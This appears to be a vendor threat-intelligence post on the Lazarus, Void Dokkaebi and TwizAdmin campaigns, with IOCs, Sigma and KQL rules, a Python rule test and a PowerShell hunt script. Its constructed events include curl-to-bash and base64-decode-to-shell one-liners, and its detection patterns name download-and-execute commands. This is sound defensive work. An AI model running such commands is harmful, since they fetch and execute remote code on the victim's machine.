
Lazarus & Void Dokkaebi Campaigns: Mach-O Man, TwizAdmin, and Dev Repo Poisoning — OTX Pulse Analysis

Security Arsenal Team
April 23, 2026

Live OTX data indicates a surge in sophisticated operations targeting the financial and technology sectors. Three distinct campaigns, attributed to Void Dokkaebi, Lazarus Group and DataBreachPlus, combine social engineering with supply chain attacks to deploy multi-platform malware.

  • Void Dokkaebi (WageMole): Actively targeting software developers via fake job interviews and poisoned Git repositories. The campaign uses malicious VS Code tasks to propagate the DEV#POPPER RAT and BeaverTail loader.
  • Lazarus Group (Mach-O Man): Deploying a new macOS malware kit via "ClickFix" attacks. Victims are lured via fake meeting invitations on Telegram, tricking them into running terminal commands that install PyLangGhostRAT.
  • DataBreachPlus (TwizAdmin): A Russian-speaking operation pushing a multi-stage malware suite (TwizAdmin/crpx0) that combines cryptocurrency clipping (8 chains), seed phrase theft, and ransomware capabilities. The operation utilizes an exposed FastAPI C2 panel.

Collectively, these campaigns show a shift toward cross-platform tooling (Windows and macOS) focused on credential harvesting and financial theft.

Threat Actor / Malware Profile

1. TwizAdmin (DataBreachPlus)

  • Malware Families: TwizAdmin, crpx0 (Ransomware), Java RAT.
  • Distribution: Masquerades as FedEx delivery notifications or as utility downloads.
  • Behavior: A modular payload that initially functions as a crypto-clipper, replacing wallet addresses in the clipboard. It escalates to BIP-39 seed phrase theft and browser credential dumping. A secondary ransomware module (crpx0) can be deployed if monetization fails.
  • C2: FastAPI-based panel hosted on port 1337; requires license keys, suggesting a MaaS (Malware-as-a-Service) model.

2. Mach-O Man / PyLangGhostRAT (Lazarus Group)

  • Malware Families: Mach-O Man, PyLangGhostRAT.
  • Distribution: "ClickFix" social engineering. Targets receive fake Zoom/Teams calendar invites via Telegram, leading to fraudulent sites that prompt users to run curl or bash commands to "fix" connection issues.
  • Behavior: Native macOS payloads (Mach-O binaries) that steal browser cookies, passwords, and Telegram session data. Exfiltration is performed via the Telegram API.

3. Void Dokkaebi (Famous Chollima)

  • Malware Families: DEV#POPPER RAT, InvisibleFerret, OtterCookie, BeaverTail.
  • Distribution: Supply chain attack via cloned malicious repositories. Initial contact is made through fake recruiter interviews on LinkedIn/Telegram.
  • Behavior: Poisoned .vscode/tasks.json files carry a task whose runOptions.runOn is set to folderOpen, so its command runs as soon as the project is opened in VS Code. Automatic tasks of this kind only fire once the workspace is trusted; Workspace Trust's Restricted Mode suppresses them. The malware worm-propagates by tampering with local Git history and pushing malicious changes to victim-owned repositories, so one infected developer can seed further poisoned clones.

IOC Analysis

The provided IOCs include:

  • Network Infrastructure: C2 IPs including 103.241.66[.]238 (TwizAdmin), 166.88.4[.]2, and several hosts in 23.27.0.0/16 (23.27.20[.]143, 23.27.202[.]27, 23.27.120[.]142) associated with Void Dokkaebi; the full list is reproduced in the hunt queries below.
  • Typosquatting: livemicrosft[.]com, used in the Mach-O Man campaign to impersonate Microsoft collaboration tools.
  • File Hashes (SHA256): Over 20 unique hashes corresponding to Mach-O binaries, Windows loaders, and Python-based stealers.

Operational Guidance: SOC teams should block the listed domains and IPs at the firewall and proxy level and load the file hashes into EDR blocklists immediately. Block the specific 23.27.x.x hosts listed rather than the whole 23.27.0.0/16 on the strength of three addresses, and treat IP and hash blocks as short-lived controls, since infrastructure and payload hashes rotate quickly in campaigns of this kind; the behavioral detections that follow outlast them. Any DNS lookup or connection involving livemicrosft[.]com, or an outbound connection to TCP port 1337 on a non-private address, should trigger a high-severity alert, with a listed C2 IP as the destination taking top priority.

Detection Engineering

Sigma Rules

YAML
---
title: Potential ClickFix Activity - Shell Fetching and Executing Remote Content (macOS)
id: 6e1a3c8d-9a2b-4c0d-8e1f-1b2c3d4e5f6a
description: Detects two ClickFix execution patterns leading to payloads such as Mach-O Man. In the common flow the victim pastes the lure's command into Terminal, so the interpreter is a child of the login shell rather than of the browser; selection_cmdline therefore looks for a shell whose command line fetches or decodes content and hands it to an interpreter (e.g. bash -c "$(curl ...)"). selection_parent covers the rarer case where the browser or messaging app spawns the shell or curl directly. A command typed piece by piece into an interactive shell yields no single process carrying the full command line and is not covered.
status: experimental
date: 2026-04-23
author: Security Arsenal
logsource:
  category: process_creation
  product: macos
detection:
  selection_parent:
    ParentImage|endswith:
      - '/Google Chrome'
      - '/firefox'
      - '/Safari'
      - '/Telegram'
      - '/Microsoft Teams'
      - '/MSTeams'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/zsh'
      - '/curl'
      - '/osascript'
  selection_cmdline_shell:
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/zsh'
  selection_cmdline_fetch:
    CommandLine|contains:
      - 'curl '
      - 'wget '
      - 'base64 -d'
      - 'base64 --decode'
  selection_cmdline_exec:
    CommandLine|contains:
      - '| bash'
      - '| sh'
      - '| zsh'
      - '$(curl'
  condition: selection_parent or all of selection_cmdline_*
falsepositives:
  - Developers running curl-pipe-to-shell installers (Homebrew and similar); baseline known installer URLs or scope the rule to non-developer fleets
level: high
---
title: VS Code Task Execution Suspicious Command
id: 7b2c4d9e-0b3c-5d1e-9f2a-2c3d4e5f6a7b
description: Detects a shell or script host spawned by VS Code (a task or integrated-terminal command) whose command line downloads, decodes or evaluates content, a technique used by Void Dokkaebi to propagate BeaverTail and DEV#POPPER RAT from poisoned .vscode/tasks.json files. A task with runOptions.runOn set to folderOpen executes as soon as a trusted workspace is opened.
status: experimental
date: 2026-04-23
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\Code.exe'
      - '\Code - Insiders.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
      - '\mshta.exe'
  selection_cmd:
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'DownloadString'
      - 'DownloadFile'
      - 'Invoke-Expression'
      - 'FromBase64String'
      - 'certutil'
      - 'curl '
      - 'git config'   # hook-path or credential-helper tampering from a task
  condition: all of selection_*
falsepositives:
  - Legitimate build scripts or extensions that fetch dependencies; tune on CommandLine and workspace path
level: medium
---
title: TwizAdmin C2 Connection FastAPI Port
id: 8c3d5e0f-1c4d-6e2f-0a3b-3d4e5f6a7b8c
description: Detects outbound connections to TCP port 1337 on non-private addresses, the port on which the TwizAdmin FastAPI C2 panel was observed. The private-range exclusion uses CIDR matching; a substring test such as contains '10.' also excludes any public address containing that fragment and covers only 172.16.x.x of 172.16.0.0/12. Port alone is a weak indicator, so escalate when the destination is one of the listed C2 IPs or the initiating process is unexpected.
status: experimental
date: 2026-04-23
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationPort: 1337
    Initiated: 'true'
  filter_private:
    DestinationIp|cidr:
      - '127.0.0.0/8'
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  condition: selection and not filter_private
falsepositives:
  - Legitimate local development on port 1337 that reaches a non-private address
level: high
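
To show what the Sigma rules above do and do not catch, the following is an added example (not from the original page and not a Sigma tool): the logic of the ClickFix and port 1337 rules re-implemented in Python and run over constructed process and network events. The event records, the example.invalid URLs, and the 198.18.10.5, 172.31.5.5, 10.20.30.40 and 198.51.100.7 addresses are constructed; 103.241.66.238 is the TwizAdmin C2 IP listed on this page.

```python
"""Run the logic of the ClickFix and port 1337 Sigma rules over constructed events.

Two points the YAML alone does not show: in the usual ClickFix flow the victim pastes the
one-liner into Terminal, so the interpreter's parent is the login shell, not the browser,
and the command line is the useful signal; and the private-range exclusion in the port 1337
rule must be a CIDR test, because a substring test on "10." also excludes non-private
addresses such as 198.18.10.5. All events and addresses below are constructed.
"""
import ipaddress
import re

PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
MESSAGING_PARENTS = ("/google chrome", "/firefox", "/safari", "/telegram", "/microsoft teams", "/msteams")
SHELLS = ("/bash", "/sh", "/zsh")
FETCH = re.compile(r"\b(curl|wget)\b|base64\s+(-d|--decode)", re.I)
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(ba|z)?sh\b|\$\(\s*curl", re.I)


def is_private(ip: str) -> bool:
    """CIDR membership test, the equivalent of Sigma's |cidr modifier."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in PRIVATE_NETS)


def substring_filter(ip: str) -> bool:
    """The substring exclusion a naive rule would use, kept only to show its failure mode."""
    return any(s in ip for s in ("127.0.0.1", "10.", "192.168.", "172.16."))


def port_1337_alert(event: dict) -> bool:
    return (event.get("dst_port") == 1337 and bool(event.get("initiated"))
            and not is_private(event.get("dst_ip", "")))


def clickfix_alert(event: dict) -> bool:
    parent = event.get("parent", "").lower()
    image, cmd = event.get("image", "").lower(), event.get("cmdline", "")
    from_messaging_app = (parent.endswith(MESSAGING_PARENTS)
                          and image.endswith(SHELLS + ("/curl", "/osascript")))
    fetch_and_exec = (image.endswith(SHELLS)
                      and FETCH.search(cmd) is not None
                      and PIPE_TO_INTERPRETER.search(cmd) is not None)
    return from_messaging_app or fetch_and_exec


PROCESS_EVENTS = [  # constructed macOS process_creation events
    {"parent": "/bin/zsh", "image": "/bin/bash",
     "cmdline": 'bash -c "$(curl -fsSL https://example.invalid/fix.sh)"'},   # pasted one-liner
    {"parent": "/bin/zsh", "image": "/bin/bash",
     "cmdline": "bash -c 'echo aGk= | base64 -d | sh'"},                    # decode-and-run
    {"parent": "/Applications/Telegram.app/Contents/MacOS/Telegram", "image": "/usr/bin/curl",
     "cmdline": "curl -o /tmp/update https://example.invalid/u"},           # spawned by messenger
    {"parent": "/bin/zsh", "image": "/usr/bin/git", "cmdline": "git pull"},  # benign
    {"parent": "/bin/zsh", "image": "/bin/bash", "cmdline": "bash ./build.sh"},  # benign
]
NETWORK_EVENTS = [  # constructed network_connection events
    {"dst_ip": "103.241.66.238", "dst_port": 1337, "initiated": True},  # listed TwizAdmin C2
    {"dst_ip": "198.18.10.5", "dst_port": 1337, "initiated": True},     # non-private, contains "10."
    {"dst_ip": "172.31.5.5", "dst_port": 1337, "initiated": True},      # RFC 1918, not 172.16.x
    {"dst_ip": "10.20.30.40", "dst_port": 1337, "initiated": True},     # RFC 1918
    {"dst_ip": "198.51.100.7", "dst_port": 443, "initiated": True},     # wrong port
]


def run_rules() -> dict:
    """Return the index of each constructed event that each rule fires on."""
    return {
        "clickfix": [i for i, e in enumerate(PROCESS_EVENTS) if clickfix_alert(e)],
        "port_1337_cidr": [i for i, e in enumerate(NETWORK_EVENTS) if port_1337_alert(e)],
        # the substring variant of the same rule, for comparison
        "port_1337_substring": [i for i, e in enumerate(NETWORK_EVENTS)
                                if e["dst_port"] == 1337 and not substring_filter(e["dst_ip"])],
    }


if __name__ == "__main__":
    for rule, hits in run_rules().items():
        print(f"{rule}: events {hits}")
```

The substring variant is included only to make the failure mode concrete: it silently drops the 198.18.10.5 connection because the address contains "10.", and it lets 172.31.5.5 through because it only knows about 172.16.x, so the CIDR test is both tighter and more complete. On the process side, the two pasted one-liners are caught by their command line alone, which is the only signal available when the parent is the login shell.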

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Void Dokkaebi, Mach-O Man and TwizAdmin network IOCs
let C2IPs = dynamic([
    "103.241.66.238", "31.31.198.206", "166.88.4.2", "85.239.62.36",
    "23.27.20.143", "23.27.202.27", "23.27.120.142", "154.91.0.196",
    "198.105.127.210", "83.168.68.219"
]);
let C2Domains = dynamic(["livemicrosft.com", "fanonlyatn.xyz"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
// RemoteUrl may carry a scheme or path, so match the domain as a term rather than exactly
| where RemoteIP in (C2IPs) or RemoteUrl has_any (C2Domains)
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteIP, RemoteUrl, RemotePort
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
<#
    TwizAdmin & Void Dokkaebi IOC Hunt
    1. Checks live TCP connections against the listed C2 IPs.
    2. Scans cloned repositories for .vscode\tasks.json files that auto-run a download on folder open.
    The SHA256 list referenced above is not reproduced here; load it into EDR separately.
#>

$MaliciousIPs = @(
    "103.241.66.238", "31.31.198.206", "166.88.4.2", "85.239.62.36",
    "23.27.20.143", "23.27.202.27", "23.27.120.142", "154.91.0.196",
    "198.105.127.210", "83.168.68.219"
)

Write-Host "Checking for active network connections to C2 infrastructure..." -ForegroundColor Cyan

# Established plus half-open connections: a beacon that is still connecting shows up as SynSent
$hits = Get-NetTCPConnection -ErrorAction SilentlyContinue |
    Where-Object { ($_.State -in @('Established', 'SynSent')) -and ($_.RemoteAddress -in $MaliciousIPs) }

foreach ($conn in $hits) {
    $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
    Write-Host "[!] ALERT: Connection to $($conn.RemoteAddress):$($conn.RemotePort) ($($conn.State))" -ForegroundColor Red
    Write-Host "    PID: $($conn.OwningProcess) | Process: $($proc.ProcessName) | Path: $($proc.Path)"
}
if (-not $hits) { Write-Host "    No connections to the listed C2 IPs." }

Write-Host "Checking cloned repositories for auto-running VS Code tasks..." -ForegroundColor Cyan

# Common clone roots; extend to match your environment
$RepoRoots = @("$env:USERPROFILE\source", "$env:USERPROFILE\repos", "$env:USERPROFILE\Projects", "$env:USERPROFILE\Desktop") |
    Where-Object { Test-Path $_ }

# A task only fires on open when runOptions.runOn is "folderOpen"; flag those whose command fetches or decodes content
$FetchPattern = 'Invoke-WebRequest|DownloadString|DownloadFile|Invoke-Expression|\biex\b|curl|certutil|FromBase64String'
if ($RepoRoots) {
    Get-ChildItem -Path $RepoRoots -Recurse -Filter tasks.json -ErrorAction SilentlyContinue |
        Where-Object { $_.DirectoryName -like '*\.vscode' } |
        ForEach-Object {
            $content = Get-Content -Raw -Path $_.FullName
            if ($content -match 'folderOpen' -and $content -match $FetchPattern) {
                Write-Host "[!] Suspicious auto-run task: $($_.FullName)" -ForegroundColor Red
                Select-String -Path $_.FullName -Pattern "folderOpen|$FetchPattern" |
                    ForEach-Object { "    line $($_.LineNumber): $($_.Line.Trim())" }
            }
        }
}

# VS Code's own logs rarely record the task command line; keep this as a secondary, low-confidence check
$vscodeLogs = Get-ChildItem -Path "$env:APPDATA\Code\logs" -Recurse -Filter *.log -ErrorAction SilentlyContinue
if ($vscodeLogs) {
    Select-String -Path $vscodeLogs.FullName -Pattern "curl|Invoke-WebRequest|DownloadString" -Context 2,2 | Select-Object -Last 20
}


Response Priorities

Immediate:
  • Block all IOCs (domains fanonlyatn[.]xyz and livemicrosft[.]com; IPs 103.241.66[.]238, 166.88.4[.]2 and the rest of the list in the hunt queries above) at perimeter firewalls and proxies.
  • Isolate any endpoint with a detected connection to a listed C2 IP, or to TCP port 1337 on a non-private address from an unexpected process.
  • Scan for the listed SHA256 hashes; quarantine any matches.

24 Hours:
  • Reset credentials for developers and finance staff who may have been exposed to the stealers (TwizAdmin/Mach-O Man). Because Mach-O Man takes browser cookies and Telegram session data, also revoke active browser sessions and terminate Telegram sessions; a password change alone leaves stolen session tokens valid.
  • Treat any wallet whose seed phrase was stored or entered on an affected host as compromised and move its funds.
  • Audit Git repositories for unauthorized changes to .vscode/tasks.json and for recent pushes from unknown developers.

1 Week:
  • Restrict terminal and shell use on macOS devices to users who need it, via MDM or application control policy, and alert on curl-pipe-to-shell and base64-decode-to-shell command lines for everyone else, so that ClickFix is blunted without blocking developers outright.
  • Enforce review-and-approval workflows for external VS Code extensions and cloned Git repositories, and keep VS Code Workspace Trust enabled so that automatic tasks cannot run until a developer explicitly trusts the folder.
  • Conduct security awareness training focused on identifying fake job interview lures and fake meeting invitations.
